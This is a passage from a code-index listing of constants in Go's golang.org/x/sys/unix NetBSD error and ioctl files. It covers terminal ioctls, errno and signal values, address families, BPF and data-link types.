0x48087446 constant TIOCPTSNAME (line 1422) | TIOCPTSNAME = 0x48087448 constant TIOCRCVFRAME (line 1423) | TIOCRCVFRAME = 0x80047445 constant TIOCREMOTE (line 1424) | TIOCREMOTE = 0x80047469 constant TIOCSBRK (line 1425) | TIOCSBRK = 0x2000747b constant TIOCSCTTY (line 1426) | TIOCSCTTY = 0x20007461 constant TIOCSDTR (line 1427) | TIOCSDTR = 0x20007479 constant TIOCSETA (line 1428) | TIOCSETA = 0x802c7414 constant TIOCSETAF (line 1429) | TIOCSETAF = 0x802c7416 constant TIOCSETAW (line 1430) | TIOCSETAW = 0x802c7415 constant TIOCSETD (line 1431) | TIOCSETD = 0x8004741b constant TIOCSFLAGS (line 1432) | TIOCSFLAGS = 0x8004745c constant TIOCSIG (line 1433) | TIOCSIG = 0x2000745f constant TIOCSLINED (line 1434) | TIOCSLINED = 0x80207443 constant TIOCSPGRP (line 1435) | TIOCSPGRP = 0x80047476 constant TIOCSQSIZE (line 1436) | TIOCSQSIZE = 0x80047480 constant TIOCSSIZE (line 1437) | TIOCSSIZE = 0x80087467 constant TIOCSTART (line 1438) | TIOCSTART = 0x2000746e constant TIOCSTAT (line 1439) | TIOCSTAT = 0x80047465 constant TIOCSTI (line 1440) | TIOCSTI = 0x80017472 constant TIOCSTOP (line 1441) | TIOCSTOP = 0x2000746f constant TIOCSWINSZ (line 1442) | TIOCSWINSZ = 0x80087467 constant TIOCUCNTL (line 1443) | TIOCUCNTL = 0x80047466 constant TIOCXMTFRAME (line 1444) | TIOCXMTFRAME = 0x80047444 constant TOSTOP (line 1445) | TOSTOP = 0x400000 constant VDISCARD (line 1446) | VDISCARD = 0xf constant VDSUSP (line 1447) | VDSUSP = 0xb constant VEOF (line 1448) | VEOF = 0x0 constant VEOL (line 1449) | VEOL = 0x1 constant VEOL2 (line 1450) | VEOL2 = 0x2 constant VERASE (line 1451) | VERASE = 0x3 constant VINTR (line 1452) | VINTR = 0x8 constant VKILL (line 1453) | VKILL = 0x5 constant VLNEXT (line 1454) | VLNEXT = 0xe constant VMIN (line 1455) | VMIN = 0x10 constant VQUIT (line 1456) | VQUIT = 0x9 constant VREPRINT (line 1457) | VREPRINT = 0x6 constant VSTART (line 1458) | VSTART = 0xc constant VSTATUS (line 1459) | VSTATUS = 0x12 constant VSTOP (line 1460) | VSTOP = 0xd constant VSUSP (line 1461) | VSUSP = 0xa constant VTIME (line 1462) | VTIME = 0x11 constant VWERASE (line 1463) | VWERASE = 0x4 constant WALL (line 1464) | WALL = 0x8 constant WALLSIG (line 1465) | WALLSIG = 0x8 constant WALTSIG (line 1466) | WALTSIG = 0x4 constant WCLONE (line 1467) | WCLONE = 0x4 constant WCOREFLAG (line 1468) | WCOREFLAG = 0x80 constant WNOHANG (line 1469) | WNOHANG = 0x1 constant WNOWAIT (line 1470) | WNOWAIT = 0x10000 constant WNOZOMBIE (line 1471) | WNOZOMBIE = 0x20000 constant WOPTSCHECKED (line 1472) | WOPTSCHECKED = 0x40000 constant WSTOPPED (line 1473) | WSTOPPED = 0x7f constant WUNTRACED (line 1474) | WUNTRACED = 0x2 constant E2BIG (line 1479) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1480) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1481) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 1482) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EAFNOSUPPORT (line 1483) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EAGAIN (line 1484) | EAGAIN = syscall.Errno(0x23) constant EALREADY (line 1485) | EALREADY = syscall.Errno(0x25) constant EAUTH (line 1486) | EAUTH = syscall.Errno(0x50) constant EBADF (line 1487) | EBADF = syscall.Errno(0x9) constant EBADMSG (line 1488) | EBADMSG = syscall.Errno(0x58) constant EBADRPC (line 1489) | EBADRPC = syscall.Errno(0x48) constant EBUSY (line 1490) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1491) | ECANCELED = syscall.Errno(0x57) constant ECHILD (line 1492) | ECHILD = syscall.Errno(0xa) constant ECONNABORTED (line 1493) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 1494) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 1495) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 1496) | EDEADLK = syscall.Errno(0xb) constant EDESTADDRREQ (line 1497) | EDESTADDRREQ = syscall.Errno(0x27) constant EDOM (line 1498) | EDOM = syscall.Errno(0x21) constant EDQUOT (line 1499) | EDQUOT = syscall.Errno(0x45) constant EEXIST (line 1500) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1501) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1502) | EFBIG = syscall.Errno(0x1b) constant EFTYPE (line 1503) | EFTYPE = syscall.Errno(0x4f) constant EHOSTDOWN (line 1504) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 1505) | EHOSTUNREACH = syscall.Errno(0x41) constant EIDRM (line 1506) | EIDRM = syscall.Errno(0x52) constant EILSEQ (line 1507) | EILSEQ = syscall.Errno(0x55) constant EINPROGRESS (line 1508) | EINPROGRESS = syscall.Errno(0x24) constant EINTR (line 1509) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1510) | EINVAL = syscall.Errno(0x16) constant EIO (line 1511) | EIO = syscall.Errno(0x5) constant EISCONN (line 1512) | EISCONN = syscall.Errno(0x38) constant EISDIR (line 1513) | EISDIR = syscall.Errno(0x15) constant ELAST (line 1514) | ELAST = syscall.Errno(0x60) constant ELOOP (line 1515) | ELOOP = syscall.Errno(0x3e) constant EMFILE (line 1516) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1517) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1518) | EMSGSIZE = syscall.Errno(0x28) constant EMULTIHOP (line 1519) | EMULTIHOP = syscall.Errno(0x5e) constant ENAMETOOLONG (line 1520) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENEEDAUTH (line 1521) | ENEEDAUTH = syscall.Errno(0x51) constant ENETDOWN (line 1522) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 1523) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 1524) | ENETUNREACH = syscall.Errno(0x33) constant ENFILE (line 1525) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1526) | ENOATTR = syscall.Errno(0x5d) constant ENOBUFS (line 1527) | ENOBUFS = syscall.Errno(0x37) constant ENODATA (line 1528) | ENODATA = syscall.Errno(0x59) constant ENODEV (line 1529) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1530) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1531) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1532) | ENOLCK = syscall.Errno(0x4d) constant ENOLINK (line 1533) | ENOLINK = syscall.Errno(0x5f) constant ENOMEM (line 1534) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1535) | ENOMSG = syscall.Errno(0x53) constant ENOPROTOOPT (line 1536) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSPC (line 1537) | ENOSPC = syscall.Errno(0x1c) constant ENOSR (line 1538) | ENOSR = syscall.Errno(0x5a) constant ENOSTR (line 1539) | ENOSTR = syscall.Errno(0x5b) constant ENOSYS (line 1540) | ENOSYS = syscall.Errno(0x4e) constant ENOTBLK (line 1541) | ENOTBLK = syscall.Errno(0xf) constant ENOTCONN (line 1542) | ENOTCONN = syscall.Errno(0x39) constant ENOTDIR (line 1543) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1544) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTSOCK (line 1545) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 1546) | ENOTSUP = syscall.Errno(0x56) constant ENOTTY (line 1547) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1548) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1549) | EOPNOTSUPP = syscall.Errno(0x2d) constant EOVERFLOW (line 1550) | EOVERFLOW = syscall.Errno(0x54) constant EPERM (line 1551) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1552) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPIPE (line 1553) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1554) | EPROCLIM = syscall.Errno(0x43) constant EPROCUNAVAIL (line 1555) | EPROCUNAVAIL = syscall.Errno(0x4c) constant EPROGMISMATCH (line 1556) | EPROGMISMATCH = syscall.Errno(0x4b) constant EPROGUNAVAIL (line 1557) | EPROGUNAVAIL = syscall.Errno(0x4a) constant EPROTO (line 1558) | EPROTO = syscall.Errno(0x60) constant EPROTONOSUPPORT (line 1559) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 1560) | EPROTOTYPE = syscall.Errno(0x29) constant ERANGE (line 1561) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1562) | EREMOTE = syscall.Errno(0x47) constant EROFS (line 1563) | EROFS = syscall.Errno(0x1e) constant ERPCMISMATCH (line 1564) | ERPCMISMATCH = syscall.Errno(0x49) constant ESHUTDOWN (line 1565) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 1566) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESPIPE (line 1567) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1568) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1569) | ESTALE = syscall.Errno(0x46) constant ETIME (line 1570) | ETIME = syscall.Errno(0x5c) constant ETIMEDOUT (line 1571) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 1572) | ETOOMANYREFS = syscall.Errno(0x3b) constant ETXTBSY (line 1573) | ETXTBSY = syscall.Errno(0x1a) constant EUSERS (line 1574) | EUSERS = syscall.Errno(0x44) constant EWOULDBLOCK (line 1575) | EWOULDBLOCK = syscall.Errno(0x23) constant EXDEV (line 1576) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1581) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1582) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1583) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 1584) | SIGCHLD = syscall.Signal(0x14) constant SIGCONT (line 1585) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 1586) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1587) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 1588) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1589) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1590) | SIGINFO = syscall.Signal(0x1d) constant SIGINT (line 1591) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1592) | SIGIO = syscall.Signal(0x17) constant SIGIOT (line 1593) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 1594) | SIGKILL = syscall.Signal(0x9) constant SIGPIPE (line 1595) | SIGPIPE = syscall.Signal(0xd) constant SIGPROF (line 1596) | SIGPROF = syscall.Signal(0x1b) constant SIGPWR (line 1597) | SIGPWR = syscall.Signal(0x20) constant SIGQUIT (line 1598) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1599) | SIGSEGV = syscall.Signal(0xb) constant SIGSTOP (line 1600) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1601) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1602) | SIGTERM = syscall.Signal(0xf) constant SIGTRAP (line 1603) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1604) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1605) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1606) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1607) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1608) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1609) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 1610) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 1611) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1612) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1613) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_netbsd_arm64.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_ARP (line 15) | AF_ARP = 0x1c constant AF_BLUETOOTH (line 16) | AF_BLUETOOTH = 0x1f constant AF_CCITT (line 17) | AF_CCITT = 0xa constant AF_CHAOS (line 18) | AF_CHAOS = 0x5 constant AF_CNT (line 19) | AF_CNT = 0x15 constant AF_COIP (line 20) | AF_COIP = 0x14 constant AF_DATAKIT (line 21) | AF_DATAKIT = 0x9 constant AF_DECnet (line 22) | AF_DECnet = 0xc constant AF_DLI (line 23) | AF_DLI = 0xd constant AF_E164 (line 24) | AF_E164 = 0x1a constant AF_ECMA (line 25) | AF_ECMA = 0x8 constant AF_HYLINK (line 26) | AF_HYLINK = 0xf constant AF_IEEE80211 (line 27) | AF_IEEE80211 = 0x20 constant AF_IMPLINK (line 28) | AF_IMPLINK = 0x3 constant AF_INET (line 29) | AF_INET = 0x2 constant AF_INET6 (line 30) | AF_INET6 = 0x18 constant AF_IPX (line 31) | AF_IPX = 0x17 constant AF_ISDN (line 32) | AF_ISDN = 0x1a constant AF_ISO (line 33) | AF_ISO = 0x7 constant AF_LAT (line 34) | AF_LAT = 0xe constant AF_LINK (line 35) | AF_LINK = 0x12 constant AF_LOCAL (line 36) | AF_LOCAL = 0x1 constant AF_MAX (line 37) | AF_MAX = 0x23 constant AF_MPLS (line 38) | AF_MPLS = 0x21 constant AF_NATM (line 39) | AF_NATM = 0x1b constant AF_NS (line 40) | AF_NS = 0x6 constant AF_OROUTE (line 41) | AF_OROUTE = 0x11 constant AF_OSI (line 42) | AF_OSI = 0x7 constant AF_PUP (line 43) | AF_PUP = 0x4 constant AF_ROUTE (line 44) | AF_ROUTE = 0x22 constant AF_SNA (line 45) | AF_SNA = 0xb constant AF_UNIX (line 46) | AF_UNIX = 0x1 constant AF_UNSPEC (line 47) | AF_UNSPEC = 0x0 constant ARPHRD_ARCNET (line 48) | ARPHRD_ARCNET = 0x7 constant ARPHRD_ETHER (line 49) | ARPHRD_ETHER = 0x1 constant ARPHRD_FRELAY (line 50) | ARPHRD_FRELAY = 0xf constant ARPHRD_IEEE1394 (line 51) | ARPHRD_IEEE1394 = 0x18 constant ARPHRD_IEEE802 (line 52) | ARPHRD_IEEE802 = 0x6 constant ARPHRD_STRIP (line 53) | ARPHRD_STRIP = 0x17 constant B0 (line 54) | B0 = 0x0 constant B110 (line 55) | B110 = 0x6e constant B115200 (line 56) | B115200 = 0x1c200 constant B1200 (line 57) | B1200 = 0x4b0 constant B134 (line 58) | B134 = 0x86 constant B14400 (line 59) | B14400 = 0x3840 constant B150 (line 60) | B150 = 0x96 constant B1800 (line 61) | B1800 = 0x708 constant B19200 (line 62) | B19200 = 0x4b00 constant B200 (line 63) | B200 = 0xc8 constant B230400 (line 64) | B230400 = 0x38400 constant B2400 (line 65) | B2400 = 0x960 constant B28800 (line 66) | B28800 = 0x7080 constant B300 (line 67) | B300 = 0x12c constant B38400 (line 68) | B38400 = 0x9600 constant B460800 (line 69) | B460800 = 0x70800 constant B4800 (line 70) | B4800 = 0x12c0 constant B50 (line 71) | B50 = 0x32 constant B57600 (line 72) | B57600 = 0xe100 constant B600 (line 73) | B600 = 0x258 constant B7200 (line 74) | B7200 = 0x1c20 constant B75 (line 75) | B75 = 0x4b constant B76800 (line 76) | B76800 = 0x12c00 constant B921600 (line 77) | B921600 = 0xe1000 constant B9600 (line 78) | B9600 = 0x2580 constant BIOCFEEDBACK (line 79) | BIOCFEEDBACK = 0x8004427d constant BIOCFLUSH (line 80) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 81) | BIOCGBLEN = 0x40044266 constant BIOCGDLT (line 82) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 83) | BIOCGDLTLIST = 0xc0104277 constant BIOCGETIF (line 84) | BIOCGETIF = 0x4090426b constant BIOCGFEEDBACK (line 85) | BIOCGFEEDBACK = 0x4004427c constant BIOCGHDRCMPLT (line 86) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRTIMEOUT (line 87) | BIOCGRTIMEOUT = 0x4010427b constant BIOCGSEESENT (line 88) | BIOCGSEESENT = 0x40044278 constant BIOCGSTATS (line 89) | BIOCGSTATS = 0x4080426f constant BIOCGSTATSOLD (line 90) | BIOCGSTATSOLD = 0x4008426f constant BIOCIMMEDIATE (line 91) | BIOCIMMEDIATE = 0x80044270 constant BIOCPROMISC (line 92) | BIOCPROMISC = 0x20004269 constant BIOCSBLEN (line 93) | BIOCSBLEN = 0xc0044266 constant BIOCSDLT (line 94) | BIOCSDLT = 0x80044276 constant BIOCSETF (line 95) | BIOCSETF = 0x80104267 constant BIOCSETIF (line 96) | BIOCSETIF = 0x8090426c constant BIOCSFEEDBACK (line 97) | BIOCSFEEDBACK = 0x8004427d constant BIOCSHDRCMPLT (line 98) | BIOCSHDRCMPLT = 0x80044275 constant BIOCSRTIMEOUT (line 99) | BIOCSRTIMEOUT = 0x8010427a constant BIOCSSEESENT (line 100) | BIOCSSEESENT = 0x80044279 constant BIOCSTCPF (line 101) | BIOCSTCPF = 0x80104272 constant BIOCSUDPF (line 102) | BIOCSUDPF = 0x80104273 constant BIOCVERSION (line 103) | BIOCVERSION = 0x40044271 constant BPF_A (line 104) | BPF_A = 0x10 constant BPF_ABS (line 105) | BPF_ABS = 0x20 constant BPF_ADD (line 106) | BPF_ADD = 0x0 constant BPF_ALIGNMENT (line 107) | BPF_ALIGNMENT = 0x8 constant BPF_ALIGNMENT32 (line 108) | BPF_ALIGNMENT32 = 0x4 constant BPF_ALU (line 109) | BPF_ALU = 0x4 constant BPF_AND (line 110) | BPF_AND = 0x50 constant BPF_B (line 111) | BPF_B = 0x10 constant BPF_DFLTBUFSIZE (line 112) | BPF_DFLTBUFSIZE = 0x100000 constant BPF_DIV (line 113) | BPF_DIV = 0x30 constant BPF_H (line 114) | BPF_H = 0x8 constant BPF_IMM (line 115) | BPF_IMM = 0x0 constant BPF_IND (line 116) | BPF_IND = 0x40 constant BPF_JA (line 117) | BPF_JA = 0x0 constant BPF_JEQ (line 118) | BPF_JEQ = 0x10 constant BPF_JGE (line 119) | BPF_JGE = 0x30 constant BPF_JGT (line 120) | BPF_JGT = 0x20 constant BPF_JMP (line 121) | BPF_JMP = 0x5 constant BPF_JSET (line 122) | BPF_JSET = 0x40 constant BPF_K (line 123) | BPF_K = 0x0 constant BPF_LD (line 124) | BPF_LD = 0x0 constant BPF_LDX (line 125) | BPF_LDX = 0x1 constant BPF_LEN (line 126) | BPF_LEN = 0x80 constant BPF_LSH (line 127) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 128) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 129) | BPF_MAXBUFSIZE = 0x1000000 constant BPF_MAXINSNS (line 130) | BPF_MAXINSNS = 0x200 constant BPF_MEM (line 131) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 132) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 133) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 134) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 135) | BPF_MISC = 0x7 constant BPF_MSH (line 136) | BPF_MSH = 0xa0 constant BPF_MUL (line 137) | BPF_MUL = 0x20 constant BPF_NEG (line 138) | BPF_NEG = 0x80 constant BPF_OR (line 139) | BPF_OR = 0x40 constant BPF_RELEASE (line 140) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 141) | BPF_RET = 0x6 constant BPF_RSH (line 142) | BPF_RSH = 0x70 constant BPF_ST (line 143) | BPF_ST = 0x2 constant BPF_STX (line 144) | BPF_STX = 0x3 constant BPF_SUB (line 145) | BPF_SUB = 0x10 constant BPF_TAX (line 146) | BPF_TAX = 0x0 constant BPF_TXA (line 147) | BPF_TXA = 0x80 constant BPF_W (line 148) | BPF_W = 0x0 constant BPF_X (line 149) | BPF_X = 0x8 constant BRKINT (line 150) | BRKINT = 0x2 constant CFLUSH (line 151) | CFLUSH = 0xf constant CLOCAL (line 152) | CLOCAL = 0x8000 constant CLONE_CSIGNAL (line 153) | CLONE_CSIGNAL = 0xff constant CLONE_FILES (line 154) | CLONE_FILES = 0x400 constant CLONE_FS (line 155) | CLONE_FS = 0x200 constant CLONE_PID (line 156) | CLONE_PID = 0x1000 constant CLONE_PTRACE (line 157) | CLONE_PTRACE = 0x2000 constant CLONE_SIGHAND (line 158) | CLONE_SIGHAND = 0x800 constant CLONE_VFORK (line 159) | CLONE_VFORK = 0x4000 constant CLONE_VM (line 160) | CLONE_VM = 0x100 constant CPUSTATES (line 161) | CPUSTATES = 0x5 constant CP_IDLE (line 162) | CP_IDLE = 0x4 constant CP_INTR (line 163) | CP_INTR = 0x3 constant CP_NICE (line 164) | CP_NICE = 0x1 constant CP_SYS (line 165) | CP_SYS = 0x2 constant CP_USER (line 166) | CP_USER = 0x0 constant CREAD (line 167) | CREAD = 0x800 constant CRTSCTS (line 168) | CRTSCTS = 0x10000 constant CS5 (line 169) | CS5 = 0x0 constant CS6 (line 170) | CS6 = 0x100 constant CS7 (line 171) | CS7 = 0x200 constant CS8 (line 172) | CS8 = 0x300 constant CSIZE (line 173) | CSIZE = 0x300 constant CSTART (line 174) | CSTART = 0x11 constant CSTATUS (line 175) | CSTATUS = 0x14 constant CSTOP (line 176) | CSTOP = 0x13 constant CSTOPB (line 177) | CSTOPB = 0x400 constant CSUSP (line 178) | CSUSP = 0x1a constant CTL_HW (line 179) | CTL_HW = 0x6 constant CTL_KERN (line 180) | CTL_KERN = 0x1 constant CTL_MAXNAME (line 181) | CTL_MAXNAME = 0xc constant CTL_NET (line 182) | CTL_NET = 0x4 constant CTL_QUERY (line 183) | CTL_QUERY = -0x2 constant DIOCBSFLUSH (line 184) | DIOCBSFLUSH = 0x20006478 constant DLT_A429 (line 185) | DLT_A429 = 0xb8 constant DLT_A653_ICM (line 186) | DLT_A653_ICM = 0xb9 constant DLT_AIRONET_HEADER (line 187) | DLT_AIRONET_HEADER = 0x78 constant DLT_AOS (line 188) | DLT_AOS = 0xde constant DLT_APPLE_IP_OVER_IEEE1394 (line 189) | DLT_APPLE_IP_OVER_IEEE1394 = 0x8a constant DLT_ARCNET (line 190) | DLT_ARCNET = 0x7 constant DLT_ARCNET_LINUX (line 191) | DLT_ARCNET_LINUX = 0x81 constant DLT_ATM_CLIP (line 192) | DLT_ATM_CLIP = 0x13 constant DLT_ATM_RFC1483 (line 193) | DLT_ATM_RFC1483 = 0xb constant DLT_AURORA (line 194) | DLT_AURORA = 0x7e constant DLT_AX25 (line 195) | DLT_AX25 = 0x3 constant DLT_AX25_KISS (line 196) | DLT_AX25_KISS = 0xca constant DLT_BACNET_MS_TP (line 197) | DLT_BACNET_MS_TP = 0xa5 constant DLT_BLUETOOTH_HCI_H4 (line 198) | DLT_BLUETOOTH_HCI_H4 = 0xbb constant DLT_BLUETOOTH_HCI_H4_WITH_PHDR (line 199) | DLT_BLUETOOTH_HCI_H4_WITH_PHDR = 0xc9 constant DLT_CAN20B (line 200) | DLT_CAN20B = 0xbe constant DLT_CAN_SOCKETCAN (line 201) | DLT_CAN_SOCKETCAN = 0xe3 constant DLT_CHAOS (line 202) | DLT_CHAOS = 0x5 constant DLT_CISCO_IOS (line 203) | DLT_CISCO_IOS = 0x76 constant DLT_C_HDLC (line 204) | DLT_C_HDLC = 0x68 constant DLT_C_HDLC_WITH_DIR (line 205) | DLT_C_HDLC_WITH_DIR = 0xcd constant DLT_DECT (line 206) | DLT_DECT = 0xdd constant DLT_DOCSIS (line 207) | DLT_DOCSIS = 0x8f constant DLT_ECONET (line 208) | DLT_ECONET = 0x73 constant DLT_EN10MB (line 209) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 210) | DLT_EN3MB = 0x2 constant DLT_ENC (line 211) | DLT_ENC = 0x6d constant DLT_ERF (line 212) | DLT_ERF = 0xc5 constant DLT_ERF_ETH (line 213) | DLT_ERF_ETH = 0xaf constant DLT_ERF_POS (line 214) | DLT_ERF_POS = 0xb0 constant DLT_FC_2 (line 215) | DLT_FC_2 = 0xe0 constant DLT_FC_2_WITH_FRAME_DELIMS (line 216) | DLT_FC_2_WITH_FRAME_DELIMS = 0xe1 constant DLT_FDDI (line 217) | DLT_FDDI = 0xa constant DLT_FLEXRAY (line 218) | DLT_FLEXRAY = 0xd2 constant DLT_FRELAY (line 219) | DLT_FRELAY = 0x6b constant DLT_FRELAY_WITH_DIR (line 220) | DLT_FRELAY_WITH_DIR = 0xce constant DLT_GCOM_SERIAL (line 221) | DLT_GCOM_SERIAL = 0xad constant DLT_GCOM_T1E1 (line 222) | DLT_GCOM_T1E1 = 0xac constant DLT_GPF_F (line 223) | DLT_GPF_F = 0xab constant DLT_GPF_T (line 224) | DLT_GPF_T = 0xaa constant DLT_GPRS_LLC (line 225) | DLT_GPRS_LLC = 0xa9 constant DLT_GSMTAP_ABIS (line 226) | DLT_GSMTAP_ABIS = 0xda constant DLT_GSMTAP_UM (line 227) | DLT_GSMTAP_UM = 0xd9 constant DLT_HDLC (line 228) | DLT_HDLC = 0x10 constant DLT_HHDLC (line 229) | DLT_HHDLC = 0x79 constant DLT_HIPPI (line 230) | DLT_HIPPI = 0xf constant DLT_IBM_SN (line 231) | DLT_IBM_SN = 0x92 constant DLT_IBM_SP (line 232) | DLT_IBM_SP = 0x91 constant DLT_IEEE802 (line 233) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 234) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 235) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_IEEE802_11_RADIO_AVS (line 236) | DLT_IEEE802_11_RADIO_AVS = 0xa3 constant DLT_IEEE802_15_4 (line 237) | DLT_IEEE802_15_4 = 0xc3 constant DLT_IEEE802_15_4_LINUX (line 238) | DLT_IEEE802_15_4_LINUX = 0xbf constant DLT_IEEE802_15_4_NONASK_PHY (line 239) | DLT_IEEE802_15_4_NONASK_PHY = 0xd7 constant DLT_IEEE802_16_MAC_CPS (line 240) | DLT_IEEE802_16_MAC_CPS = 0xbc constant DLT_IEEE802_16_MAC_CPS_RADIO (line 241) | DLT_IEEE802_16_MAC_CPS_RADIO = 0xc1 constant DLT_IPMB (line 242) | DLT_IPMB = 0xc7 constant DLT_IPMB_LINUX (line 243) | DLT_IPMB_LINUX = 0xd1 constant DLT_IPNET (line 244) | DLT_IPNET = 0xe2 constant DLT_IPV4 (line 245) | DLT_IPV4 = 0xe4 constant DLT_IPV6 (line 246) | DLT_IPV6 = 0xe5 constant DLT_IP_OVER_FC (line 247) | DLT_IP_OVER_FC = 0x7a constant DLT_JUNIPER_ATM1 (line 248) | DLT_JUNIPER_ATM1 = 0x89 constant DLT_JUNIPER_ATM2 (line 249) | DLT_JUNIPER_ATM2 = 0x87 constant DLT_JUNIPER_CHDLC (line 250) | DLT_JUNIPER_CHDLC = 0xb5 constant DLT_JUNIPER_ES (line 251) | DLT_JUNIPER_ES = 0x84 constant DLT_JUNIPER_ETHER (line 252) | DLT_JUNIPER_ETHER = 0xb2 constant DLT_JUNIPER_FRELAY (line 253) | DLT_JUNIPER_FRELAY = 0xb4 constant DLT_JUNIPER_GGSN (line 254) | DLT_JUNIPER_GGSN = 0x85 constant DLT_JUNIPER_ISM (line 255) | DLT_JUNIPER_ISM = 0xc2 constant DLT_JUNIPER_MFR (line 256) | DLT_JUNIPER_MFR = 0x86 constant DLT_JUNIPER_MLFR (line 257) | DLT_JUNIPER_MLFR = 0x83 constant DLT_JUNIPER_MLPPP (line 258) | DLT_JUNIPER_MLPPP = 0x82 constant DLT_JUNIPER_MONITOR (line 259) | DLT_JUNIPER_MONITOR = 0xa4 constant DLT_JUNIPER_PIC_PEER (line 260) | DLT_JUNIPER_PIC_PEER = 0xae constant DLT_JUNIPER_PPP (line 261) | DLT_JUNIPER_PPP = 0xb3 constant DLT_JUNIPER_PPPOE (line 262) | DLT_JUNIPER_PPPOE = 0xa7 constant DLT_JUNIPER_PPPOE_ATM (line 263) | DLT_JUNIPER_PPPOE_ATM = 0xa8 constant DLT_JUNIPER_SERVICES (line 264) | DLT_JUNIPER_SERVICES = 0x88 constant DLT_JUNIPER_ST (line 265) | DLT_JUNIPER_ST = 0xc8 constant DLT_JUNIPER_VP (line 266) | DLT_JUNIPER_VP = 0xb7 constant DLT_LAPB_WITH_DIR (line 267) | DLT_LAPB_WITH_DIR = 0xcf constant DLT_LAPD (line 268) | DLT_LAPD = 0xcb constant DLT_LIN (line 269) | DLT_LIN = 0xd4 constant DLT_LINUX_EVDEV (line 270) | DLT_LINUX_EVDEV = 0xd8 constant DLT_LINUX_IRDA (line 271) | DLT_LINUX_IRDA = 0x90 constant DLT_LINUX_LAPD (line 272) | DLT_LINUX_LAPD = 0xb1 constant DLT_LINUX_SLL (line 273) | DLT_LINUX_SLL = 0x71 constant DLT_LOOP (line 274) | DLT_LOOP = 0x6c constant DLT_LTALK (line 275) | DLT_LTALK = 0x72 constant DLT_MFR (line 276) | DLT_MFR = 0xb6 constant DLT_MOST (line 277) | DLT_MOST = 0xd3 constant DLT_MPLS (line 278) | DLT_MPLS = 0xdb constant DLT_MTP2 (line 279) | DLT_MTP2 = 